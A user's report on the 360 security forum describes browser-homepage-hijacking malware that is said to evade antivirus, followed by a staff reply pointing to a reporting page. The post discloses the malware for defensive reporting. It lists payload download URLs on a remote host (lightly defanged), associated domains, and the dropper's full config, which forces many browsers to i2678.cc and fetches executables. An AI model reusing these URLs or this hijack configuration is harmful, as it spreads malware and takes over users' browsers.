请使用手机微信扫码安全登录

切换账号密码登录

绑定手机号

应国家法规对于账号实名的要求,请您在进行下一步操作前,需要先完成手机绑定 (若绑定失败,请重新登录绑定)。了解更多

不绑定绑定手机号

360官网 | 360商城

推荐论坛版块活动360粉丝商城众测粉丝轰趴馆常见问题
主进程(可以直接下载):
http删://www2.掉xiao删niu321掉.com:9002/jin/1/Y删ic.exe
http删://www2.掉xiao删niu321掉.com:9002/jin/1/Nidi删spla2.exe

此恶意软件,可以逃过主流杀软的检测(含360)

相关的域名(hosts):
powerservice.csii.com.cn
windows10.microdone.cn
www2.xiaoniu321.com
i2678.cc  (iframe框架)
www.i2678.cc(iframe框架)

通过explorer启动下载Yic.exe到temp目录,并产生sTup.exe

影响:
任何浏览器直接绑定http://i2678.cchttp://www.i2678.cc

sTup.exe配置文件内容
[Config]
lkurls=http://i2678.cc;http://i2678.cc;http://i2678.cc;http://www.i2678.cc
brow=TSBrowser.exe;ChromeCore.exe
nbrow=
hdurl=
hdtm=
browul=360chrome.exe;360se.exe=http://i2678.cc|iexplore.exe;qqbrowser.exe=http://i2678.cc|2345Explorer.exe;2345chrome.exe=http://www.i2678.cc|ucbrowser.exe;firefox.exe;liebao.exe;maxthon.exe;baidubrowser.exe;sogouexplorer.exe;opera.exe;f1browser.exe;Juzi.exe;TaoBrowser.exe;Opera\launcher.exe;chrome.exe;TSBrowser.exe;ChromeCore.exe=http://i2678.cc
bsit1_3=http://www2.xiao删niu321.com:9002/jin/1/Yic.exe*sTup.exe*1000**0x02
bsit1_6=http://www2.xiao删niu321.com:9002/jin/1/Yic.exe*sTup.exe*1000**0x02
bsit2_3=http://www2.xiao删niu321.com:9002/jin/1/Nidispla2.exe*Nidispla2.exe*1000**0x02
bsit2_6=http://www2.xiao删niu321.com:9002/jin/1/Nidispla2.exe*Nidispla2.exe*1000**0x02
tbwk=1


共 1 个关于浏览器主页篡改的恶意软件的回复 最后回复于 2022-3-3 14:22

评论

直达楼层

360电脑专家003 产品答疑师 发表于 2022-3-3 14:22 | 显示全部楼层 | 私信
您好,请在如下网址进行举报:https://fuwu.360.cn/jubao/wenjian
您需要登录后才可以回帖 登录 | 注册

本版积分规则

360fans_uid11426915 LV2.下士

粉丝:0 关注:0 积分:29

精华:0 金币:32 经验:28

最后登录时间:2023-1-29

私信 加好友

最新活动

360安全云盘安卓 Flutter 版v5.0.0公测来袭

排行榜

热度排行 查看排行
今日 本周 本月 全部
    今日 本周 本月 全部

      内容推荐 热门推荐最新主帖

      扫码添加360客服号,涨知识的同时还有超多福利等你哦

      快速回复 返回顶部 返回列表